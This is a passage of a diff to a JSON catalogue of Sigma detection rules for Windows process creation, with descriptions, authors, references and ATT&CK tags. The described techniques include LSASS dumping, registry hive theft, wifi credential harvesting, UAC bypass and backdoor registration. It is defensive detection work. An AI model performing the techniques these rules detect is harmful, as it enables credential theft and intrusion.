"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_winrm_awl_bypass.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1216" + ] + }, + "uuid": "074e0ded-6ced-4ebd-8b4d-53f55908119d", + "value": "AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl" + }, + { + "description": "Detects suspicious execution of Regasm/Regsvcs utilities", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/25", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lolbin_regasm.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.fortiguard.com/threat-signal-report/4718?s=09", + "https://lolbas-project.github.io/lolbas/Binaries/Regsvcs/", + "https://lolbas-project.github.io/lolbas/Binaries/Regasm/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_regasm.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.009" + ] + }, + "uuid": "cc368ed0-2411-45dc-a222-510ace303cb2", + "value": "Regasm/Regsvcs Suspicious Execution" + }, + { + "description": "Detects browsers starting with the remote debugging flags. Which is a technique often used to perform browser injection attacks", + "meta": { + "author": "pH-T, Nasreddine Bencherchali (update)", + "creation_date": "2022/07/27", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_browser_remote_debugging.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/defaultnamehere/cookie_crimes/", + "https://yoroi.company/wp-content/uploads/2022/05/EternityGroup_report_compressed.pdf", + "https://www.mdsec.co.uk/2022/10/analysing-lastpass-part-1/", + "https://github.com/wunderwuzzi23/firefox-cookiemonster", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_browser_remote_debugging.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1185" + ] + }, + "uuid": "b3d34dc5-2efd-4ae3-845f-8ec14921f449", + "value": "Browser Started with Remote Debugging" }, { "description": "Detect use of PDQ Deploy remote admin tool", @@ -44088,30 +38682,6 @@ "uuid": "d679950c-abb7-43a6-80fb-2a480c4fc450", "value": "Use of PDQ Deploy Remote Adminstartion Tool" }, - { - "description": "Detects modification addition to the 'TypedPaths' key in the user or admin registry via the commandline. Which might indicate persistence attempt", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/08/22", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_persistence_typed_paths.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/dez_/status/1560101453150257154", - "https://forensafe.com/blogs/typedpaths.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_persistence_typed_paths.yml" - ], - "tags": [ - "attack.persistence" - ] - }, - "uuid": "ec88289a-7e1a-4cc3-8d18-bd1f60e4b9ba", - "value": "Persistence Via TypedPaths - CommandLine" - }, { "description": "Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report", "meta": { @@ -44125,8 +38695,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/backdoor-at-the-end-of-the-icmp-tunnel", "https://app.any.run/tasks/4a54c651-b70b-4b72-84d7-f34d301d6406", + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/backdoor-at-the-end-of-the-icmp-tunnel", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pingback_backdoor.yml" ], "tags": [ @@ -44137,6 +38707,257 @@ "uuid": "b2400ffb-7680-47c0-b08a-098a7de7e7a9", "value": "Pingback Backdoor" }, + { + "description": "Detects the execution of a renamed binary often used by attackers or malware leveraging new Sysmon OriginalFileName datapoint.", + "meta": { + "author": "Matthew Green - @mgreen27, Florian Roth", + "creation_date": "2019/06/15", + "falsepositive": [ + "Custom applications use renamed binaries adding slight change to binary name. Typically this is easy to spot and add to whitelist" + ], + "filename": "proc_creation_win_renamed_binary_highly_relevant.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://mgreen27.github.io/posts/2019/05/29/BinaryRename2.html", + "https://mgreen27.github.io/posts/2019/05/12/BinaryRename.html", + "https://attack.mitre.org/techniques/T1036/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_binary_highly_relevant.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036.003" + ] + }, + "uuid": "0ba1da6d-b6ce-4366-828c-18826c9de23e", + "value": "Highly Relevant Renamed Binary" + }, + { + "description": "Identifies use of the bcdedit command to delete boot configuration data. This tactic is sometimes used as by malware or an attacker as a destructive technique.", + "meta": { + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", + "creation_date": "2019/10/24", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_bootconf_mod.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md", + "https://eqllib.readthedocs.io/en/latest/analytics/c4732632-9c1d-4980-9fa8-1d98c93f918e.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bootconf_mod.yml" + ], + "tags": [ + "attack.impact", + "attack.t1490" + ] + }, + "uuid": "1444443e-6757-43e4-9ea4-c8fc705f79a2", + "value": "Modification of Boot Configuration" + }, + { + "description": "Detect the harvesting of wifi credentials using netsh.exe", + "meta": { + "author": "Andreas Hunkeler (@Karneades), oscd.community", + "creation_date": "2020/04/20", + "falsepositive": [ + "Legitimate administrator or user uses netsh.exe wlan functionality for legitimate reason" + ], + "filename": "proc_creation_win_netsh_wifi_credential_harvesting.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://blog.malwarebytes.com/threat-analysis/2020/04/new-agenttesla-variant-steals-wifi-credentials/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_wifi_credential_harvesting.yml" + ], + "tags": [ + "attack.discovery", + "attack.credential_access", + "attack.t1040" + ] + }, + "uuid": "42b1a5b8-353f-4f10-b256-39de4467faff", + "value": "Harvesting of Wifi Credentials Using netsh.exe" + }, + { + "description": "Detects scheduled task creations that have suspicious action command and folder combinations", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/04/15", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_schtasks_folder_combos.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lazarus-dream-job-chemical", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_schtasks_folder_combos.yml" + ], + "tags": [ + "attack.execution", + "attack.t1053.005" + ] + }, + "uuid": "8a8379b8-780b-4dbf-b1e9-31c8d112fefb", + "value": "Schtasks From Suspicious Folders" + }, + { + "description": "Detects Access to Domain Group Policies stored in SYSVOL", + "meta": { + "author": "Markus Neis, Jonhnathan Ribeiro, oscd.community", + "creation_date": "2018/04/09", + "falsepositive": [ + "Administrative activity" + ], + "filename": "proc_creation_win_susp_sysvol_access.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.hybrid-analysis.com/sample/f2943f5e45befa52fb12748ca7171d30096e1d4fc3c365561497c618341299d5?environmentId=100", + "https://adsecurity.org/?p=2288", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_sysvol_access.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1552.006" + ] + }, + "uuid": "05f3c945-dcc8-4393-9f3d-af65077a8f86", + "value": "Suspicious SYSVOL Domain Group Policy Access" + }, + { + "description": "Detects Schtask creations that point to a suspicious folder or an environment variable often used by malware", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/02/21", + "falsepositive": [ + "Benign scheduled tasks creations or executions that happen often during software installations", + "Software that uses the AppData folder and scheduled tasks to update the software in the AppData folders" + ], + "filename": "proc_creation_win_susp_schtasks_env_folder.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.joesandbox.com/analysis/514608/0/html#324415FF7D8324231381BAD48A052F85DF04", + "https://www.welivesecurity.com/2022/01/18/donot-go-do-not-respawn/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_schtasks_env_folder.yml" + ], + "tags": [ + "attack.execution", + "attack.t1053.005" + ] + }, + "uuid": "81325ce1-be01-4250-944f-b4789644556f", + "value": "Suspicious Schtasks From Env Var Folder" + }, + { + "description": "Detects suspicious DACL modifications via the \"Set-Service\" cmdlet using the \"SecurityDescriptorSddl\" flag (Only available with PowerShell 7) that can be used to hide services or make them unstopable", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/10/18", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_service_dacl_modification_set_service.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/pt-br/windows/win32/secauthz/sid-strings", + "https://www.sans.org/blog/red-team-tactics-hiding-windows-services/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_service_dacl_modification_set_service.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1543.003" + ] + }, + "uuid": "a95b9b42-1308-4735-a1af-abb1c5e6f5ac", + "value": "Suspicious Service DACL Modification Via Set-Service Cmdlet" + }, + { + "description": "Detects the export of a crital Registry key to a file.", + "meta": { + "author": "Oddvar Moe, Sander Wiebing, oscd.community", + "creation_date": "2020/10/12", + "falsepositive": [ + "Dumping hives for legitimate purpouse i.e. backup or forensic investigation" + ], + "filename": "proc_creation_win_regedit_export_critical_keys.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Regedit/", + "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regedit_export_critical_keys.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1012" + ] + }, + "uuid": "82880171-b475-4201-b811-e9c826cd5eaa", + "value": "Exports Critical Registry Keys To a File" + }, + { + "description": "Detects a flag anomaly in which regsvr32.exe uses a /i flag without using a /n flag at the same time", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/07/13", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_regsvr32_flags_anomaly.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/sbousseaden/status/1282441816986484737?s=12", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_regsvr32_flags_anomaly.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.010" + ] + }, + "uuid": "b236190c-1c61-41e9-84b3-3fe03f6d76b0", + "value": "Regsvr32 Flags Anomaly" + }, + { + "description": "Detects unusual parent or children of the wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) processes as seen being used with bumblebee activity", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/12", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_wab_unusual_parents.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bumblebee-loader-cybercrime", + "https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/", + "https://thedfirreport.com/2022/09/26/bumblebee-round-two/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wab_unusual_parents.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.execution" + ] + }, + "uuid": "63d1ccc0-2a43-4f4b-9289-361b308991ff", + "value": "Wab/Wabmig Unusual Parent Or Child Processes" + }, { "description": "Detects the execution of an executable that is typically used by PlugX for DLL side loading started from an uncommon location", "meta": { @@ -44150,8 +38971,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "http://www.hexacorn.com/blog/2016/03/10/beyond-good-ol-run-key-part-36/", "https://countuponsecurity.com/2017/06/07/threat-hunting-in-the-enterprise-with-appcompatprocessor/", + "http://www.hexacorn.com/blog/2016/03/10/beyond-good-ol-run-key-part-36/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_plugx_susp_exe_locations.yml" ], "tags": [ @@ -44164,79 +38985,1666 @@ "value": "Executable Used by PlugX in Uncommon Location" }, { - "description": "Detect modification of services configuration (ImagePath, FailureCommand and ServiceDLL) in registry by processes with Medium integrity level", + "description": "Detects the registration of a debugger for a program that is available in the logon screen (sticky key backdoor).", "meta": { - "author": "Teymur Kheirkhabarov", - "creation_date": "2019/10/26", + "author": "Florian Roth, oscd.community, Jonhnathan Ribeiro", + "creation_date": "2019/09/06", "falsepositive": [ "Unknown" ], - "filename": "proc_creation_win_possible_privilege_escalation_via_service_reg_perm.yml", + "filename": "proc_creation_win_install_reg_debugger_backdoor.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://blogs.technet.microsoft.com/jonathantrull/2016/10/03/detecting-sticky-key-backdoors/", + "https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_install_reg_debugger_backdoor.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1546.008" + ] + }, + "uuid": "ae215552-081e-44c7-805f-be16f975c8a2", + "value": "Suspicious Debugger Registration Cmdline" + }, + { + "description": "Detects base64 encoded strings used in hidden malicious PowerShell command lines", + "meta": { + "author": "John Lambert (rule)", + "creation_date": "2019/01/16", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_powershell_hidden_b64_cmd.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "http://www.leeholmes.com/blog/2017/09/21/searching-for-content-in-base-64-strings/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_hidden_b64_cmd.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "f26c6093-6f14-4b12-800f-0fcb46f5ffd0", + "value": "Malicious Base64 Encoded PowerShell Keywords in Command Lines" + }, + { + "description": "Detect creation of dump files containing the memory space of lsass.exe, which contains sensitive credentials.\nIdentifies usage of Sysinternals procdump.exe to export the memory space of lsass.exe which contains sensitive credentials.\n", + "meta": { + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community", + "creation_date": "2019/10/24", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_lsass_dump.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://eqllib.readthedocs.io/en/latest/analytics/210b4ea4-12fc-11e9-8d76-4d6bb837cda4.html", + "https://eqllib.readthedocs.io/en/latest/analytics/1e1ef6be-12fc-11e9-8d76-4d6bb837cda4.html", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003/T1003.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lsass_dump.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ] + }, + "uuid": "ffa6861c-4461-4f59-8a41-578c39f3f23e", + "value": "LSASS Memory Dumping" + }, + { + "description": "Threat actors can use auditpol binary to change audit policy configuration to impair detection capability.\nThis can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.\n", + "meta": { + "author": "Janantha Marasinghe (https://github.com/blueteam0ps)", + "creation_date": "2021/02/02", + "falsepositive": [ + "Admin activity" + ], + "filename": "proc_creation_win_sus_auditpol_usage.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sus_auditpol_usage.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.002" + ] + }, + "uuid": "0a13e132-651d-11eb-ae93-0242ac130002", + "value": "Suspicious Auditpol Usage" + }, + { + "description": "Detects usage of attrib with \"+s\" option to set suspicious script or executable as system files to hide them from users and make them unable to delete with simple rights. The rule limit the search to specific extensions and directories to avoid FP's", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/06/28", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_attrib_system_susp_paths.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://app.any.run/tasks/cfc8870b-ccd7-4210-88cf-a8087476a6d0", + "https://app.any.run/tasks/c28cabc8-a19f-40f3-a78b-cae506a5c0d4", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_attrib_system_susp_paths.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564.001" + ] + }, + "uuid": "efec536f-72e8-4656-8960-5e85d091345b", + "value": "Set Suspicious Files as System Files Using Attrib" + }, + { + "description": "Detects a regedit started with TrustedInstaller privileges or by ProcessHacker.exe", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/05/27", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_susp_regedit_trustedinstaller.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/1kwpeter/status/1397816101455765504", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_regedit_trustedinstaller.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1548" + ] + }, + "uuid": "883835a7-df45-43e4-bf1d-4268768afda4", + "value": "Regedit as Trusted Installer" + }, + { + "description": "Detects NotPetya ransomware activity in which the extracted passwords are passed back to the main module via named pipe, the file system journal of drive C is deleted and windows eventlogs are cleared using wevtutil", + "meta": { + "author": "Florian Roth, Tom Ueltschi", + "creation_date": "2019/01/16", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_malware_notpetya.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://securelist.com/schroedingers-petya/78870/", + "https://www.hybrid-analysis.com/sample/64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1?environmentId=100", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_notpetya.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.011", + "attack.t1070.001", + "attack.credential_access", + "attack.t1003.001", + "car.2016-04-002" + ] + }, + "uuid": "79aeeb41-8156-4fac-a0cd-076495ab82a1", + "value": "NotPetya Ransomware Activity" + }, + { + "description": "Detects the use of Fast Reverse Proxy. frp is a fast reverse proxy to help you expose a local server behind a NAT or firewall to the Internet.", + "meta": { + "author": "frack113, Florian Roth", + "creation_date": "2022/09/02", + "falsepositive": [ + "Legitimate use" + ], + "filename": "proc_creation_win_frp.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://asec.ahnlab.com/en/38156/", + "https://github.com/fatedier/frp", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_frp.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1090" + ] + }, + "uuid": "32410e29-5f94-4568-b6a3-d91a8adad863", + "value": "Fast Reverse Proxy (FRP)" + }, + { + "description": "Detects the execution of a renamed binary often used by attackers or malware leveraging new Sysmon OriginalFileName datapoint.", + "meta": { + "author": "Matthew Green - @mgreen27, Ecco, James Pemberton / @4A616D6573, oscd.community (improvements), Andreas Hunkeler (@Karneades)", + "creation_date": "2019/06/15", + "falsepositive": [ + "Custom applications use renamed binaries adding slight change to binary name. Typically this is easy to spot and add to whitelist", + "PsExec installed via Windows Store doesn't contain original filename field (False negative)" + ], + "filename": "proc_creation_win_renamed_binary.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://mgreen27.github.io/posts/2019/05/29/BinaryRename2.html", + "https://mgreen27.github.io/posts/2019/05/12/BinaryRename.html", + "https://attack.mitre.org/techniques/T1036/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_binary.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036.003" + ] + }, + "uuid": "36480ae1-a1cb-4eaa-a0d6-29801d7e9142", + "value": "Renamed Binary" + }, + { + "description": "Detects the malicious use of a control panel item", + "meta": { + "author": "Kyaw Min Thein, Furkan Caliskan (@caliskanfurkan_)", + "creation_date": "2020/06/22", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_control_panel_item.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://attack.mitre.org/techniques/T1196/", + "https://ired.team/offensive-security/code-execution/code-execution-through-control-panel-add-ins", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_control_panel_item.yml" + ], + "tags": [ + "attack.execution", + "attack.defense_evasion", + "attack.t1218.002", + "attack.persistence", + "attack.t1546" + ] + }, + "uuid": "0ba863e6-def5-4e50-9cea-4dd8c7dc46a4", + "value": "Control Panel Items" + }, + { + "description": "Detects execution via MSSQL xp_cmdshell stored procedure. Malicious users may attempt to elevate their privileges by using xp_cmdshell, which is disabled by default.", + "meta": { + "author": "Tim Rauch", + "creation_date": "2022/09/28", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_execution_mssql_xp_cmdshell_stored_procedure.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.elastic.co/guide/en/security/current/execution-via-mssql-xp_cmdshell-stored-procedure.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_execution_mssql_xp_cmdshell_stored_procedure.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ] + }, + "uuid": "344482e4-a477-436c-aa70-7536d18a48c7", + "value": "Execution via MSSQL Xp_cmdshell Stored Procedure" + }, + { + "description": "Dump sam, system or security hives using REG.exe utility", + "meta": { + "author": "Teymur Kheirkhabarov, Endgame, JHasenbusch, Daniil Yugoslavskiy, oscd.community", + "creation_date": "2019/10/22", + "falsepositive": [ + "Dumping hives for legitimate purpouse i.e. backup or forensic investigation" + ], + "filename": "proc_creation_win_grabbing_sensitive_hives_via_reg.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://eqllib.readthedocs.io/en/latest/analytics/aed95fc6-5e3f-49dc-8b35-06508613f979.html", + "https://www.wietzebeukema.nl/blog/windows-command-line-obfuscation", + "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003/T1003.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_grabbing_sensitive_hives_via_reg.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.002", + "attack.t1003.004", + "attack.t1003.005", + "car.2013-07-001" + ] + }, + "uuid": "fd877b94-9bb5-4191-bb25-d79cbd93c167", + "value": "Grabbing Sensitive Hives via Reg Utility" + }, + { + "description": "AdFind continues to be seen across majority of breaches. It is used to domain trust discovery to plan out subsequent steps in the attack chain.", + "meta": { + "author": "Janantha Marasinghe (https://github.com/blueteam0ps), FPT.EagleEye Team, omkar72, oscd.community", + "creation_date": "2021/02/02", + "falsepositive": [ + "Legitimate admin activity" + ], + "filename": "proc_creation_win_susp_adfind_usage.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2021/01/11/trickbot-still-alive-and-well/", + "https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/", + "https://www.joeware.net/freetools/tools/adfind/", + "https://github.com/center-for-threat-informed-defense/adversary_emulation_library/blob/bf62ece1c679b07b5fb49c4bae947fe24c81811f/fin6/Emulation_Plan/Phase1.md", + "https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx", + "https://thedfirreport.com/2020/05/08/adfind-recon/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_adfind_usage.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1018", + "attack.t1087.002", + "attack.t1482", + "attack.t1069.002" + ] + }, + "uuid": "9a132afa-654e-11eb-ae93-0242ac130002", + "value": "AdFind Usage Detection" + }, + { + "description": "Detects suspicious Hangul Word Processor (Hanword) sub processes that could indicate an exploitation", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/10/24", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_hwp_exploits.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://en.wikipedia.org/wiki/Hangul_(word_processor)", + "https://twitter.com/cyberwar_15/status/1187287262054076416", + "https://blog.alyac.co.kr/1901", + "https://www.hybrid-analysis.com/search?query=context:74940dcc5b38f9f9b1a0fea760d344735d7d91b610e6d5bd34533dd0153402c5&from_sample=5db135000388385a7644131f&block_redirect=1", + "https://www.securitynewspaper.com/2016/11/23/technical-teardown-exploit-malware-hwp-files/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hwp_exploits.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1566.001", + "attack.execution", + "attack.t1203", + "attack.t1059.003", + "attack.g0032" + ] + }, + "uuid": "023394c4-29d5-46ab-92b8-6a534c6f447b", + "value": "Suspicious HWP Sub Processes" + }, + { + "description": "Detects attempts to bypass User Account Control (UAC) by hijacking the Microsoft Management Console (MMC) Windows Firewall snap-in", + "meta": { + "author": "Tim Rauch", + "creation_date": "2022/09/27", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_uac_bypass_hijacking_firwall_snap_in.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.elastic.co/guide/en/security/current/uac-bypass-via-windows-firewall-snap-in-hijack.html#uac-bypass-via-windows-firewall-snap-in-hijack", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_hijacking_firwall_snap_in.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1548" + ] + }, + "uuid": "e52cb31c-10ed-4aea-bcb7-593c9f4a315b", + "value": "UAC Bypass via Windows Firewall Snap-In Hijack" + }, + { + "description": "Detect use of WebBrowserPassView.exe", + "meta": { + "author": "frack113", + "creation_date": "2022/08/20", + "falsepositive": [ + "Legitimate use" + ], + "filename": "proc_creation_win_webbrowserpassview.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1555.003/T1555.003.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_webbrowserpassview.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1555.003" + ] + }, + "uuid": "d0dae994-26c6-4d2d-83b5-b3c8b79ae513", + "value": "Launch WebBrowserPassView Executable" + }, + { + "description": "7-Zip through 21.07 on Windows allows privilege escalation (CVE-2022-29072) and command execution when a file with the .7z extension is dragged to the Help>Contents area. This is caused by misconfiguration of 7z.dll and a heap overflow. The command runs in a child process under the 7zFM.exe process.", + "meta": { + "author": "frack113", + "creation_date": "2022/04/17", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_7zip_cve_2022_29072.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/kagancapar/status/1515219358234161153", + "https://github.com/kagancapar/CVE-2022-29072", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_7zip_cve_2022_29072.yml" + ], + "tags": [ + "cve.2022.29072" + ] + }, + "uuid": "9a4ccd1a-3526-4d99-b980-9f9c5d3a6ee3", + "value": "Suspicious 7zip Subprocess" + }, + { + "description": "Detects usage of the Quarks PwDump tool via commandline arguments", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/09/05", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_quarks_pwdump.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/seedworm-apt-iran-middle-east", + "https://github.com/quarkslab/quarkspwdump", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_quarks_pwdump.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.002" + ] + }, + "uuid": "0685b176-c816-4837-8e7b-1216f346636b", + "value": "Quarks PwDump Usage" + }, + { + "description": "Execution of ssh.exe to perform data exfiltration and tunneling through 